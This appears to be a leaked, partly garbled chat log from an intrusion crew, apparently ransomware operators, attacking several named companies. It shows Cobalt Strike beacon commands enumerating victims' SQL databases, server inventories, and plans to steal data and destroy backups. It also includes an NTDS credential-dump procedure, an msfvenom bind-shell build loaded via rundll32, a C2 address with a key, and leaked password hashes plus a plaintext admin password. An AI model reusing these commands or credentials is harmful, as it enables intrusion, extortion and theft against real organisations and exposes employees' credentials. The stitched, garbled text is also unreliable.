Workforce sys sysfulltextcatalogs VIEW NULL
Workforce sys sysindexes VIEW NULL
Workforce sys sysindexkeys VIEW NULL
Workforce sys syslanguages VIEW NULL
Workforce sys syslockinfo VIEW NULL
Workforce sys syslogins VIEW NULL
Workforce sys sysmembers VIEW NULL
Workforce sys sysmessages VIEW NULL
Workforce sys sysobjects VIEW NULL
Workforce sys sysoledbusers VIEW NULL
Workforce sys sysopentapes VIEW NULL
Workforce sys sysperfinfo VIEW NULL
Workforce sys syspermissions VIEW NULL
Workforce sys sysprocesses VIEW NULL
Workforce sys sysprotects VIEW NULL
Workforce sys sysreferences VIEW NULL
Workforce sys sysremotelogins VIEW NULL
Workforce syss sysservers VIEW NULL
Workforce sys system_columns VIEW NULL
Workforce sys system_components_surface_area_configuration VIEW NULL
Workforce sys system_internals_allocation_units VIEW NULL
Workforce sys system_internals_partition_columns VIEW NULL
Workforce sys system_internals_partitions VIEW NULL
Workforce sys system_objects VIEW NULL
Workforce sys system_parameters VIEW NULL
Workforce sys system_sql_modules VIEW NULL
Workforce sys system_views VIEW NULL
Workforce sys systypes VIEW NULL
Workforce sys sysusers VIEW NULL
Workforce sys table_types VIEW NULL
Workforce sys tables VIEW NULL
Workforce sys tcp_endpoints VIEW NULL
Workforce sys trace_categories VIEW NULL
Workforce sys trace_columns VIEW NULL
Workforce sys trace_event_bindings VIEW NULL
Workforce sys trace_events VIEW NULL
Workforce sys trace_subclass_values VIEW NULL
Workforce sys traces VIEW NULL
Workforce sys transmission_queue VIEW NULL
Workforce sys trigger_event_types VIEW NULL
Workforce sys trigger_events VIEW NULL
Workforce sys triggers VIEW NULL
Workforce sys type_assembly_usages VIEW NULL
Workforce sys types VIEW NULL
Workforce sys user_token VIEW NULL
Workforce sys via_endpoints VIEW NULL
Workforce sys views VIEW NULL
Workforce sys xml_indexes VIEW NULL
Workforce sys xml_schema_attributes VIEW NULL
Workforce sys xml_schema_collections VIEW NULL
Workforce sys xml_schema_component_placements VIEW NULL
Workforce sys xml_schema_components VIEW NULL
Workforce sys xml_schema_elements VIEW NULL
Workforce sys xml_schema_facets VIEW NULL
Workforce sys xml_schema_model_groups VIEW NULL
Workforce sys xml_schema_namespaces VIEW NULL
Workforce sys xml_schema_types VIEW NULL
Workforce sys xml_schema_wildcard_namespaces VIEW NULL
Workforce sys xml_schema_wildcards VIEW NULL

(449 rows affected)
``@tl1 said two databases need to be backed up hahaha what are we looking for in databases anyway? I'd just take a closer look at these.
nothing interesting in particular

InsightEnt
Intermec
SmartSystems
WimanDB
Workforceforceshare with size in megabytes so...[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=8DyG3ArtXqXhgJJ6t) ?what are you pulling@tl1 the rest are dead on one in netstat no whining
```
beacon> shell sqlcmd -S 10.89.11.118,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[*] Tasked beacon to run: sqlcmd -S 10.89.11.118,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[+] host called home, sent: 108 bytes
[+] received output:
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
ReportServer_AxUat
ReportServer_AxUatTempDB
ReportServer_AxCanada
ReportServer_AxCanadaTempDB
ReportServer_AxCrp5
ReportServer_AxCrp5TempDB
ReportServer_AxFinance
ReportServer_AxFinanceTempDB
ReportServer_AxTest
ReportServer_AxTestTempDB
ReportServer_AxTraining
ReportServer_AxTrainingTempDB

(16 rows affected)
```
 
``AXSQL-TRN
```
beacon> shell sqlcmd -S 10.89.0.52,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[*] Tasked beacon to run: sqlcmd -S 10.89.0.52,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[+] host called home, sent: 106 bytes
[+] received output:
name
--------------------------------------------------------------------------------------------------------------------------------
Application_Registry_Service_DB_b6ae20a7272441d1b0597b0105d8c3e3
AX2012_BLD
AX2012_BLD_MB
AX2012_BLD_model
AX2012_CANADA
AX2012_CANADA_model
AX2012_CRP3
AX2012_CRP3_MB
AX2012_CRP4
AX2012_CRP4_MB
AX2012_CRP4_model
AX2012_CRP4_TRACEDB
AX2012_CRP5
AX2012_CRP5_model
AX2012_CRPFIN
AX2012_CRPFIN_model
AX2012_IMPTEST
AX2012_IMPTEST_model
AX2012_IMPTEST_Upgrade
AX2012_QA
AX2012_QA_model
AX2012_QA1
AX2012_QA1_MB
AX2012_QA1_model
AX2012_QA2
AX2012_QA2_CU12Baseline
AX2012_QA2_MB
AX2012_QA2_model
AX2012_SBX
AX2012_SBX_MB
AX2012_SBX_model
AX2012_STG
AX2012_STG_model
AX2012_TRACES
AX2012_TRN
AX2012_TRN_MB
AX2012_TRN_model
AX2012_TST
AX2012_TST_MB
AX2012_TST_model
AX2012_TST_TRACEDB
AX2012_TST1
AX2012_TST1_MB
AX2012_TST1_model
AX2012_TST1_TRACEDB
Bdc_Service_DB_c06a3175c91e44b2ac6f0da40d7f5b9d
CoreSiteStateService
DDM_AX2012_CRP4
distribution
Managed Metadata Service_e05ea79258b94560a6f89af90de24a7a
ManagementReporter_AX2012_CRP4
ManagementReporter_BLD
ManagementReporter_CRP4
ManagementReporter_TRN
ManagementReporterDM_BLD
ManagementReporterDM_CRP4
ManagementReporterDM_CRP45
ManagementReporterDM_SHEET_CRP45
ManagementReporterDM_TRN
master
model
MR2012CRP3
MR2012CRP3DDM
msdb
ProductVision_Template
ProductVision_Training
ProductVision50-DEV
ProductVision50-STAGE
RFSmart_TST
Search_Service_Application_CrawlStoreDB_8ca539d517b44414af8d236ed9912b4c
Search_Service_Application_DB_2b625dbe31d1470f89da704e564d9209
Search_Service_Application_PropertyStoreDB_d71aa79ecf9a42efbb75120fcb460ff4
Secure_Store_Service_DB_717048f580d24f16ae263e262f7763e5
SharePoint_AdminContent_a5eec525-c6b4-43bb-a842-d2507588d5a7
SharePoint_Config
SPDiagVersion
tempdb
Tfs_RTP
Tfs_TFSConfiguration
TraceParserDB
User Profile Service Application_ProfileDB_e4d31e78cfaa4bab9716b4174618c896
User Profile Service Application_SocialDB_e887f8a141424cf09b88acbac92025ad
User Profile Service Application_SyncDB_68310b46b85342f493548a2e3bd630c7
WebAnalyticsServiceApplication_ReportingDB_c519019f-5f79-4077-b1e8-892e007b8ffd
WebAnalyticsServiceApplication_StagingDB_64089515-b4ff-4bc5-a13a-401fa77f7d8b
WordAutomationServices_4f662a6015db47828d68f6f27fb36815
WSS_Content
WSS_Content_1f5ed39aa869422899ee05cb28f7eaa8
WSS_Content_7d7b46831e0949a49c62a626490e7514
WSS_Content_95f0c47fca3244c08b5a89e8d072af38
WSS_Content_b17f0e700e854d3e843fbcbf1bc17341
WSS_Content_d40efceac00144a1a49b27ead823f934
WSS_Content_EntPortal_CRP4
WSS_Content_EntPortal_TRN
WSS_Content_EntPortal_TST1
WSS_Content_f39f3064fc3e4e49955740c0797bd577
WSS_Content_f6816589378942539cf3f3814542be2e
WSS_Content_f847b732beb749dfbe560a080a9f7dcd
WSS_Content_f8c9f3af9e94407ba535a47b86435a7b
WSS_Logging
WSS_Search_AXSHAREPOINT

(101 rows affected)

```
  
`SQLSRV1`.
```
beacon> shell sqlcmd -S 89.0.0.121,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[*] Tasked beacon to run: sqlcmd -S 89.0.0.121,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[+] host called home, sent: 106 bytes
[+] received output:
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
AX_Citrix
Citrix_Farm
Citrixcitrixvm4
CitrixOutside
InsightEnt
Intermec
Radius
SharePoint
SharePoint_AdminContent_f9392d6a-41ee-4790-b04e-f14acd5064ad
SmartSystems
Symantec
WimanDB
WimanDBTest
Workforce
WSS_AdminContent_Sharepoint
WSS_Content
WSS_Content_Teams

(21 rows affected)

``And also, doesn't this mean that the esx isn't configured and doesn't work? @tl1 run it on cmd5 plz
```
adonixadmin 88781646e2a2399370c54bae7f790e58
Angel 7259ade8efc785abb4043e171e06b9c6
barracuda b4712f346339be917d4d9fe2ce3c387c barracuda
BarracudaBUP 5acd3ae4a25e042cb01513ea9104b598
bbuerck f97f8542534b19414d871e197d222747
BGW 960736ab56cfa8943d4de07ef142a730 boston
CAncelet ae8e27dc85a2682037008ebe671655f0
canceleta b6c367027c0d73a755244ad52bda9a67
cevansa 6c77565149af62e68bb41868d29ec47a
DHaase e9b57eb8af25befb91bda9b4ed95097c
EntAdmin a99a74eb78fc1f1ea3a89b53b7de7179
gahbarracuda b4712f346339be917d4d9fe2ce3c387c barracuda
Services_Backup 4df7f5cc8377559b058c30516ca88a30
wstangea 652805d304727fa73d6c4c7cfef31986
veeam 5f6e5864d8622c481a233d9472f1b3a8
``Till now, here.

``ALLOYSQL01``
```
beacon> shell sqlcmd -S 10.1.1.243,49289 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[*] Tasked beacon to run: sqlcmd -S 10.1.1.243,49289 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[+] host called home, sent: 107 bytes
[+] received output:
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
CitrixDS
x3v6
SEI
SEICube

(8 rows affected)
```
 
`SQLPROD1`.
```
beacon> shell sqlcmd -S 10.89.0.99,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[*] Tasked beacon to run: sqlcmd -S 10.89.0.99,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[+] host called home, sent: 106 bytes
[+] received output:
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
OnBaseTest
ksubscribers
kapps
KLCAuditReporting
SolarWindsOrion
SolarWindsFlowStorage
SolarWindsOrionLog
SolarWindsOrionLog_1
OnBase

(13 rows affected)
```
 
``AXSQL-PROD
```
beacon> shell sqlcmd -S 10.89.11.15,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[*] Tasked beacon to run: sqlcmd -S 10.89.11.15,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[+] host called home, sent: 107 bytes
[+] received output:
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
AX2012_PROD
AX2012_PROD_model
ProductVision_Live
ReportServer_AxLive
ReportServer_AxLiveTempDB
Remote Desktop Services

(10 rows affected)
``and backup 2 bdo you a few servers still ahead of you, ask me to read the conf conf) I asked you on what port skull read 3 times told me to read it and bluntlyu I have never done so udae neither one nor the other in the wasted a lot of time in the wasteland1433 he1344 moreover do not skull on what port skull
for remote/other local server change localhost to ip,port
alternatively - localhost,%port% (watch with netstat)

``what do you scan and why do I scan the ports, what came up - I threw it, no 1344 what exactly did I miss? You never read the confrSq51B↩lsevr iskonkretno sqlsrv process is not there[ ](http://mediaeveryone.com:3000/group/rtpcompany-com?msg=5LGeGhYeEdN7ac5Wb) @tl1
look, save the session on the skul server, process list
sqlwriter, inject, process closes
sqservr, either closes or is not injected

one has a session in the sqlservr process, I do the first command from your guide, it gives an error
```
beacon> shell sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[*] Tasked beacon to run: sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[+] host called home, sent: 100 bytes
[+] received output:
HResult 0x2, Level 16, State 1
Named Pipes Provider: Could not open a connection to SQL Server [2].
Sqlcmd: Error: Microsoft SQL Server Native Client 10.0 : A network-related or instance-specific error has occurred while establishing a connection to SQL Server. The Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online...
Sqlcmd: Error: Microsoft SQL Server Native Client 10.0 : Login timeout expired.
```

i'm scanning the ports, i've dumped them, no 1344
tried not on all yet, but I say so far is therepeau you have a VPN on the router? without a VPN pinged if we came in and you have not pinged[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=j5JGpr3MEqWEZ8Wkn) like yes vpntak may be a real thing in the connection to the internet?) not even pingedvpn my also came in I can not go to your cobu ``
209.222.101.55:44468
7e5cwdkA7IVxKavO28aD8v06XBaUG8Sd9
``Maybe then give what data on the coba for starters....)to you)) kicked out and does not connect To whom is the question? my coba failed? The genuine BackupService.exe file is a software component of Asus WebStorage by eCareme Technologies now ASUS Cloud Corporation.
 PID PPID Name Arch Session User
 --- ---- ---- ---- ------- ----
 0 0 [System Process]
 4 0 System x64 0 NT AUTHORITY\SYSTEM
 272 4 smss.exe x64 0 NT AUTHORITY\SYSTEM
 452 436 csrss.exe x64 1 NT AUTHORITY\SYSTEM
 508,436 winlogon.exe x64 1 NT AUTHORITY\SYSTEM
 11340 508 logonUI.exe x64 1 NT AUTHORITY\SYSTEM
 6788 5964 explorer.exe x64 1 ALLOY\Administrator
 368 6788 cpqteam.exe x64 1 ALLOY\Administrator
 380 368 csrss.exe x64 0 NT AUTHORITY\SYSTEM
 2144 380 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 2540 380 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 3212 380 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 3256 380 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 5204 380 conhost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 6008 380 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 6020 380 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 6108 380 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 428 368 wininit.exe x64 0 NT AUTHORITY\SYSTEM
 560 428 services.exe x64 0 NT AUTHORITY\SYSTEM
 140 560 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 6044 140 dwm.exe x64 1 ALLOY\Administrator
 396 560 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 684 560 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 4284 684 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM
 4304 684 WmiPrvSE.exe x64 0 NT AUTHORITY/\NETWORK SERVICE
 6660 684 vdsldr.exe x64 0 NT AUTHORITY\SYSTEM
 768 560 svchost.exe x64 0 NT AUTHORITY/\NETWORK SERVICE
 872 560 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 928 560 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 5468 928 taskeng.exe x64 0 NT AUTHORITY\SYSTEM
 5160 5468 rundll32.exe x64 0 NT AUTHORITY\SYSTEM
 5860 5468 rundll32.exe x64 0 NT AUTHORITY\SYSTEM
 5920 5468 rundll32.exe x64 0 NT AUTHORITY\SYSTEM
 5952 5468 rundll32.exe x64 0 NT AUTHORITY\SYSTEM
 6208 5468 rundll32.exe x64 0 NT AUTHORITY\SYSTEM
 6232 5468 rundll32.exe x64 0 NT AUTHORITY\SYSTEM
 6256 5468 rundll32.exe x64 0 NT AUTHORITY\SYSTEM
 6272 5468 rundll32.exe x64 0 NT AUTHORITY\SYSTEM
 988 560 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 1048 560 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1148 560 spoolsv.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1272 560 adxdsrv.exe x64 0 ALLOYSQL01\sagert
 1296 560 cissesrv.exe x64 0 NT AUTHORITY\SYSTEM
 1320 560 cpqrcmc.exe x64 0 NT AUTHORITY\SYSTEM
 1352 560 vcagent.exe x64 0 NT AUTHORITY\SYSTEM
 1388 560 KaseyaEndpoint.exe x64 0 NT AUTHORITY\SYSTEM
 1476 560 AgentMon.exe x86 0 NT AUTHORITY\SYSTEM
 5976 1476 Lua.exe x86 0 NT AUTHORITY\SYSTEM
 5988 1476 Lua.exe x86 0 NT AUTHORITY\SYSTEM
 6084 1476 Kaseya.AgentEndpoint.exe x86 0 NT AUTHORITY\SYSTEM
 1544 560 MsDtsSrvr.exe x64 0 NT AUTHORITY\SYSTEM
 1620 560 msmdsrv.exe x64 0 NT AUTHORITY\SYSTEM
 1652 560 sqlservr.exe x64 0 NT AUTHORITY\SYSTEM
 1760 560 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 1812 560 ReportingServicesService.exe x64 0 NT AUTHORITY/ LOCAL SERVICE
 1816 560 ccSvcHst.exe x86 0 NT AUTHORITY\SYSTEM
 720 1816 ccSvcHst.exe x86 1 ALLOY\Administrator
 2024 560 fdlauncher.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 5144 2024 fdhost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2076 560 snmp.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2112 560 SQLAGENT.EXE x64 0 NT AUTHORITY\SYSTEM
 2180 560 sqlbrowser.exe x86 0 NT AUTHORITY\LOCAL SERVICE
 2340 560 sysdown.exe x64 0 NT AUTHORITY\SYSTEM
 2380 560 smhstart.exe x64 0 NT AUTHORITY\SYSTEM
 2528 2380 cmd.exe x64 0 NT AUTHORITY\SYSTEM
 2556 2528 hpsmhd.exe x64 0 NT AUTHORITY\SYSTEM
 2908 2556 cmd.exe x64 0 NT AUTHORITY\SYSTEM
 2928 2908 rotatelogs.exe x64 0 NT AUTHORITY\SYSTEM
 2936 2556 cmd.exe x64 0 NT AUTHORITY\SYSTEM
 2952 2936 rotatelogs.exe x64 0 NT AUTHORITY\SYSTEM
 3092 2556 hpsmhd.exe x64 0 NT AUTHORITY\SYSTEM
 3204 3092 cmd.exe x64 0 NT AUTHORITY\SYSTEM
 3236 3204 rotatelogs.exe x64 0 NT AUTHORITY\SYSTEM
 3248 3092 cmd.exe x64 0 NT AUTHORITY\SYSTEM
 3280 3248 rotatelogs.exe x64 0 NT AUTHORITY\SYSTEM
 2460 560 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM
 2600 560 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM
 2644 560 cpqnimgt.exe x64 0 NT AUTHORITY\SYSTEM
 2676 560 cqmgserv.exe x64 0 NT AUTHORITY\SYSTEM
 2708 560 cqmgstor.exe x64 0 NT AUTHORITY\SYSTEM
 2776 560 BackupService.exe x64 0 NT AUTHORITY\SYSTEM
 3176 560 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 4264 560 VSSVC.exe x64 0 NT AUTHORITY\SYSTEM
 4392 560 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 5132 560 dllhost.exe x64 0 NT AUTHORITY\SYSTEM
 5352 560 msdtc.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 5540 560 taskhost.exe x64 1 ALLOY\Administrator
 6756 560 vds.exe x64 0 NT AUTHORITY\SYSTEM
 568 428 lsass.exe x64 0 NT AUTHORITY\SYSTEM
 584 428 lsm.exe x64 0 NT AUTHORITY\SYSTEM
 5292 6788 vm3dservice.exe x64 1 ALLOY\Administrator
 6200 6788 vmtoolsd.exe x64 1 ALLOY\Administrator
 7120 1008 KaUsrTsk.exe x86 1 ALLOY\Administrator
Read #general again, I think it's 1344, I threw down all the ports, what was the whine port?
10.1.1.243:3389
10.1.1.243:139
10.1.1.243:135
10.1.1.243:445 (platform: 500 version: 6.1 name: ALLOYSQL01 domain: ALLOY)
```sqlwriter is there? What is the process and what is the port of the whine?
```
beacon> shell sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[*] Tasked beacon to run: sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[+] host called home, sent: 100 bytes
[+] received output:
HResult 0x2, Level 16, State 1
Named Pipes Provider: Could not open a connection to SQL Server [2].
Sqlcmd: Error: Microsoft SQL Server Native Client 10.0 : A network-related or instance-specific error has occurred while establishing a connection to SQL Server. The Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online...
Sqlcmd: Error: Microsoft SQL Server Native Client 10.0 : Login timeout expired.
Sqlcmd: Error: Microsoft SQL Server Native Client 10.0 : Login timeout expired ``what do I tell you about backing up the skull? then back it up from there didn't seem to be on these 30 esx? I went into the sphere and hand grated the snapshots and gather information from now on, knock it out and put it aside ask my colleague. i did not prepare it i.e. did you find it that time but did not format the esx? the sphere seems to be in the domain and the sphere is outside the domain and you did not notice it?[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=AbGL2ZNE8my7DnLBb) the list in the sphere is closest say that the water is not ready how did you find these 30 esx?in principle, if you prepare something else to close, then you can do it tomorrow...while the others pull and matey backups 2 dbc someone 1 listings anyway updatekoby have? @all here all gather everyone then doodle you believeokayona fucked up, because 30 and a few esx you did not notice. and the whole server infrastructure is virtual - so it's up for grabs and it's fucked up then we can move[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=SmFGe7cJsJWC22kDb) doubt how much ssx you included? and from the file dumplists update it 100% on mail alerts? what you included ssx any light?[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=AhnQrGWy9bQ9cgkLY) we'll get ready, close ~ two hours + time to work bildavam still pull the serversprod bases sbacapte quicklykonfy them cloudy if they have > 30 esxxcore morning in 4 hours?[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=6YKD3tqykuwCKwGcG) no[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=rEDwQp4TD2g6p5iv7) so it would be faster to erase the cloud? that's them. a bunch of esx outside the domain have you checked for external backups? why? i already ssh on esx...then tomorrow it's already iron, we prepare it, no closing today, as i understand. they're about to have the morning...[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=2C4RfcwoibBwhT4Tx) back up the server shul for now, if there's no other interesting information, we'll take a couple of files in the box so I didn't figure out how to deal with the mail


user4
user4
6:47 PM
and with esxi is it worth downloading machine backups?

tl2
tl2
6:47 PM
I'm more interested in backups, not in vmk.
from the top of the company who is?
``And the database of whine take away and in parallel with this mail take away a couple of backups of virtuals+ listing of file trash from some folders IT, Finance, Acc, Prod set up listing of files with whine to show file size do not remember you updated hell on trust? and on the current one?

Alloy exchange
	ALLOYEXCH01
	ALLOYEXCH02 - 10.1.1.240
	GAH2K3EX

Alloy storages
	CROCKETTSTORAGE
	GAHSTORAGE
	ORANGESTORAGE
	RICHMONDSTORAGE 10.1.1.245
	
Alloy virt
	ALLOYVM01
	ALLOYXEN01
	ALLOYXENAPP
	
Alloy SQL
	ALLOYSQL01 -
	SQLPUBL - miss
	SQLREPLICA - miss

##### ===================================================================

rtpco storages
	CROCKETSTORAGE
FRANCESTORAGE
GERMANYSTORAGE
HENDSTORAGE
INDYSTORAGE
MXSTORAGE
NVSTORAGE
OHSTORAGE
ORANGESTORAGE 10.1.8.8
POLSTORAGE
SHENZHENSTORAGE
SINGSTORAGE
SUPERDATA
SUZHOUSTORAGE
TXSTORAGE
VASTORAGE
	
rtpco exchange
	EXCHANGE
	
rtpco virt & backup
	HENDVEEAM
	INVEEAM
	NEVADAHYPV1
	OHIOVEEAM
	SAN-HQ ????
	SNAP ????
	STORAGEWINONA
	STORAGEWINONA2
	
rtpco SQL
	AXSQL-DEV
	AXSQL-PROD
	SQLPROD1
	SQLSERVER
	
	
	

##### =================================================================

winona storages
	COLD ????
	SUPERDATA2
	
winona SQL
	AXSQL-PROD-OLD
	AXSQL-TRN
	SQLSRV1
	
	
``and the trust? are there petcort servers? are there files from them? do they have file dumpsters? yeshis is a couple more backups of what exactly? file listings are always with their sizes then what personal information do they not have? well this is all financial enough, not here look at all and recognizable already backed up? all[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=Y4Z5tgc5BREzr6NLB) have checked all yesh? -Mailbox mluckett -type 'Maill User' ?confused, there will be problems with office365type MailUsernet I understand that yuzak can not find so and then read the error? and still no did you make an updatestam all tnavilablе went to eksc consolev eas no accessutut imports a bit of a scam What VPN do you advise? So easy) you are also here) and what are you still here?)@tl1 We will spin them) you have 3 more sessions in the work) I hope there will be more) Thank you all! It was fun))))Thank you! See you on Monday, have a good one.Thank you all. I had a stressful and difficult week, but it made me happy) Good night! That's allKeep the manager open and see the "anomaly" think ahead, if there will be the service ac processes without a direct need on the machines where it should not be (we have a web service ac, judging by the login, and we work for DK) just jump into existing processes before that, better in winlogon jump as it is done:
1) check the status of the service which is responsible for this: `sc query vss`.
2) if off, then `sc start vss`, if on, then leave it
3) dump: `ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\abcd" q q
4) check service status `sc query vss`, and reset to original statemsfvenom -p windows/x64/meterpreter_bind_tcp rhost=10.10.30.17 lport=4444 --format raw -a x64 --platform windows --out bindshell.bin
4:55
upload /home/user/Desktop/shellConcat/bindshell64.dll
shell rundll32 C:\users\lgentry\bindshell64.dll
4:55
./shellConcatenation.1.0.0 --source=shellStarter_x64.dll --target=bindshell64.dll --addBin=bindshell.bin
stanislavtimofeish 5:01 PM
shell rundll32 C:\users\lentry\bindshell64.dll
msf6 exploit(multi/handler) >Now the task, take down the NTDS dump on dcfind_tag please report the results to your groups, what stage of progress now, have you decided, have you tried ps1 script via execute-assembly? https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1Нам you canlt, who will take over one more session? @user1 ?i wonder if they are so cospawned did not you put them? in the comments? maybe you still have one back there @user1 , @user3 there is another session, in the domain. who to give in the work? who has less load now? reciprocal thanks! Likewise.everyone have a nice appetite://dpaste.org/BIJKHelloGood morning0.dead.northerntrust.local-are there any more sessions left here?
jsteffenadmin:forestriver1111
``````
ADFS adminsolar ayoderadmin
azureadmin bhilladmin blackStratus$
BNelsonAdmin chailadmin CRMadmin
cwilsonadmin datacubepro dpawlakadmin
FaxAdmin gkoontzadmin gzapataadmin
i3bdr jsteffenadmin KGillisAdmin
mfinniganadmin MSOL_43139b2cee97 pcrusieadmin
rgoinsadmin ScaleService
SCCM-01$ sccmadmin sonicwalladmin
veeambr vmadmin


DC-01\azureadmin:::929b0230429b6f70911f7d7acae7193d:::
DC-01\FaxAdmin:::a1921b1097bcbad4b6da776328f46a3d:::
DC-01\i3bdr:::1363f55fc3af7705d2b87a1c6f6205f2:::
DC-01\mfinniganadmin:::9ebb1876eb12ab8e6455bc9a04bb0fc7:::
DC-01\rgoinsadmin:::51a879cd28cb71770144925c8efa13a2:::
DC-01\veeambr:::394738c76c3a43459001fb2cb60b0f4d:::
DC-01\adminsolar:::92e435850c723b9c178c03b070f011ba:::
DC-01\bhilladmin:::0fb7102c8c626e9f6425f000db62b724:::
DC-01\chailadmin:::e7024172cd68e7d2581bd456db4892b0:::
DC-01\datacubepro:::5d7e84015d28fd626e6a394d03a6b7e3:::
DC-01\gkoontzadmin:::a1cd8d118f899eee4e404307783e345d:::
DC-01\jsteffenadmin:::a37446e823dc85c627cb4f1a52fec991:::
DC-01\MSOL_43139b2cee97:::dd45fce8ee01243c31b07bf55280fd57:::
DC-01\ScaleService:::c90e32b26fa1c6ff5e23e4f322d85f09:::
DC-01\sccmadmin:::e8bd9c66ed562efaf9c7e72c795f347c:::
DC-01\ayoderadmin:::c44c4368b9eb73c6fbc02a63f0694af8:::
DC-01\dpawlakadmin:::9c78428402e8a82f193323eb61793dc1:::
DC-01\gzapataadmin:::9480d66020d16dbcdded7c570af3d760:::
DC-01\KGillisAdmin:::72a8777adcadc9403bfbc6863dcea85a:::
DC-01\pcrusieadmin:::1c836444443e986986bb1703dd563f6b:::
DC-01\ScanService:::3d686fcb6070a6698295be239391c01b:::
DC-01\sonicwalladmin:::54c1e5bab0f4e8d4c8da4d083da78f82:::
DC-01\vmadmin:::7e20a5b0c8de368b30977764f8b21e84:::
DC-01\ADFS:::7ba26362e2aa387335ff2a5f8beedddc:::
DC-01\BNelsonAdmin:::a5b05b0fdd0d835450da0bc03174b61f:::
DC-01\cwilsonadmin:::c37a053e98e824b7844777c404f4d319:::
DC-01\CRMadmin:::3d686fcb6070a6698295be239391c01b:::

``Give me the hashes of all YESes with their logins. What? The kerb is broken? All YESes are there.
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
´´CORP\ctxdbadmin´´ the last 5 min´s are cheerfully tapping out their death throes and session interruptions[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=mWnyWRB5HHczdREMG) even though half an hour of sessions went out and came backuser8user4
the second session was blocked
more than 7 sessions - koba flies away all add here, anyway, they dropped the network nettest labs? now add to my teammate + do not see( (you have another chat for that)
Caption Description HotFixID InstalledOn

http://support.microsoft.com/?kbid=4576484 Update KB4576484 9/11/2020

http://support.microsoft.com/?kbid=4497165 Update KB4497165 5/26/2020

http://support.microsoft.com/?kbid=4503308 Security Update KB4503308 8/30/2019

http://support.microsoft.com/?kbid=4515383 Security Update KB4515383 9/10/2019

http://support.microsoft.com/?kbid=4515530 Security Update KB4515530 8/30/2019

http://support.microsoft.com/?kbid=4516115 Security Update KB4516115 9/11/2019

http://support.microsoft.com/?kbid=4517245 Update KB4517245 5/26/2020

http://support.microsoft.com/?kbid=4520390 Security Update KB4520390 10/4/2019

http://support.microsoft.com/?kbid=4521863 Security Update KB4521863 10/9/2019

http://support.microsoft.com/?kbid=4524244 Security Update KB4524244 2/14/2020

http://support.microsoft.com/?kbid=4524569 Security Update KB4524569 11/14/2019

http://support.microsoft.com/?kbid=4528759 Security Update KB4528759 1/15/2020

http://support.microsoft.com/?kbid=4537759 Security Update KB4537759 2/14/2020

http://support.microsoft.com/?kbid=4538674 Security Update KB4538674 2/13/2020

http://support.microsoft.com/?kbid=4541338 Security Update KB4541338 3/11/2020

http://support.microsoft.com/?kbid=4552152 Security Update KB4552152 4/16/2020

http://support.microsoft.com/?kbid=4560959 Security Update KB4560959 6/10/2020

http://support.microsoft.com/?kbid=4561600 Security Update KB4561600 6/11/2020

http://support.microsoft.com/?kbid=4565554 Security Update KB4565554 7/14/2020

http://support.microsoft.com/?kbid=4569073 Security Update KB4569073 8/13/2020

